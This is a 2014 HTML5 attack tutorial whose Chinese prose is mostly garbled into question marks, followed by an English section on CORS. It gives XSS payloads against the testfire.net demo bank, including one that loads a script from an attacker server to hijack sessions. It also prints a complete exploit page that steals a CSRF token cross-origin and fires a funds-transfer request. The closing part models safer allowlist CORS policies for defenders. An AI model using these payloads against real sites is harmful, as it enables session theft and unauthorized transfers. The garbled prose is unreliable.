????HTML5????????????
???????????? ???????[ 2014/4/21 14:13:51 ] ??????????????? ??????? ???
????3??????????????http://127.0.0.1:8008/sotf.console (firefoxЧ????)
????4??????????????????????檔??Shell of the Future??????JavaScript??exp- e1.js??e2.js?????????????XSS???????????????????????
??
????5??????????????????????????
????http://www.testfire.net/bank/login.aspx (admin/admin)
????????????????????????XSS?????http://www.testfire.net/search.aspx?txtSearch=%3Cscript%3Ealert%2812%29%3C%2Fscript%3E
????6???????????????????????????????£?
????http://www.testfire.net/search.aspx?txtSearch=%3Cscript%20src=%22http://127.0.0.1:8008/e1.js%22%3E%3C/script%3E
????7????????????????????IP??????????????????????“Hijack Session”??
????8?????Hijack Session???????????????棺
???????????CSRF?????token??
?????????????????????token??????CSRF??????????????HTML5???????????????????п????????CSRF??token?????CSRF token??????URL(GET????)?????????????CORSЭ?飬???????????????CSRF payload??????????????????????????????????????????HTTP ????“origin”??????????????????withCredentials?true??????????????????????
????1?????????www.bank.com??
????2????????????CSRF????????????????????????????token???????GET????????????????????£?
<input type="hidden" id="test" name="csrfToken" value="12345678" />
???????????£?
????http://www.bank.com/Confirmation.jsp?value=200&csrfToken=1234234523
????3???????????email??IM????????????????????????????ww.attackersite.com
????4????????????????Ajax????www.bank.com????????Щ????????????????CSRF??token???
????5???????????????????token???????????CSRF??????
????6?????????д?????????δ???????Ajax????ConfirmTransfer.jsp??沢????????????????????????????csrfToken??????????????Ajax????????????а?????CSRF token??
<!DOCTYPE html>
<html>
<head>
<script>
function testing() {
  var xmlhttp;
  if (window.XMLHttpRequest) {
    xmlhttp = new XMLHttpRequest();
  } else {
    xmlhttp = new ActiveXObject("Microsoft.XMLHTTP");
  }
  // Step 1: fetch the page that embeds the CSRF token (synchronous request).
  xmlhttp.open("GET", "http://bank/Myapp/ConfirmTransfer.jsp", false);
  xmlhttp.send();
  if (xmlhttp.status == 200) {
    // Step 2: locate the csrfToken field and cut the token value out of the HTML.
    var str = xmlhttp.responseText;
    var n = str.search("csrfToken");
    var final = str.substring(n + 18, n + 28);
    // Step 3: replay the token in the state-changing GET request.
    var url = "http://bank/Myapp/TransferFund.jsp?datum1%2F=06-06-2013&Account=1234&csrfToken=" + escape(final);
    xmlhttp.open("GET", url, true);
    xmlhttp.send();
  }
}
</script>
</head>
<body onload="testing();">
</body>
</html>
???????????в???????????У???????????飬??????HTML5?У??????????????????CSRF TOKEN??????Щ??????
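The attack above only works when the bank's CORS policy lets a credentialed cross-origin request read the token page. The following added example (not code from the original post) models the browser's CORS read check and compares a reflecting server policy with an allowlist policy; all origins and the helper names are constructed for illustration.

```javascript
// Weak policy (constructed): echoes whatever Origin the request carries and allows
// credentials. This is what lets a third-party page read ConfirmTransfer.jsp, and the
// csrfToken embedded in it, with the victim's cookies attached.
function reflectingPolicy(requestOrigin) {
  return {
    'Access-Control-Allow-Origin': requestOrigin,
    'Access-Control-Allow-Credentials': 'true',
  };
}

// Hardened policy (constructed): only an explicit allowlist of origins receives CORS
// headers; every other origin gets none, so the browser refuses to expose the body.
function allowlistPolicy(allowed) {
  const allowedSet = new Set(allowed);
  return (requestOrigin) =>
    allowedSet.has(requestOrigin)
      ? {
          'Access-Control-Allow-Origin': requestOrigin,
          'Access-Control-Allow-Credentials': 'true',
          'Vary': 'Origin',
        }
      : {};
}

// Browser-side rule (simplified from the Fetch spec): a credentialed cross-origin
// response is readable only if ACAO exactly equals the requesting origin and ACAC is
// "true"; a wildcard ACAO is never accepted when credentials were sent.
function responseReadable(requestOrigin, headers, withCredentials) {
  const acao = headers['Access-Control-Allow-Origin'];
  if (acao === undefined) return false;
  if (withCredentials) {
    return acao === requestOrigin &&
      headers['Access-Control-Allow-Credentials'] === 'true';
  }
  return acao === '*' || acao === requestOrigin;
}

// Can script running at `attacker` read a credentialed response served under `policy`?
function tokenExposedTo(attacker, policy) {
  return responseReadable(attacker, policy(attacker), true);
}

const bankPolicy = allowlistPolicy(['https://app.bank.com']);
// Reflecting policy: the token page is readable from any origin.
console.log(tokenExposedTo('http://www.attackersite.com', reflectingPolicy)); // true
// Allowlist policy: only the trusted origin can read it.
console.log(tokenExposedTo('http://www.attackersite.com', bankPolicy)); // false
console.log(tokenExposedTo('https://app.bank.com', bankPolicy)); // true
```

When auditing a real deployment, the same decision can be checked by sending a request with an arbitrary Origin header and inspecting whether the response echoes it together with Access-Control-Allow-Credentials: true.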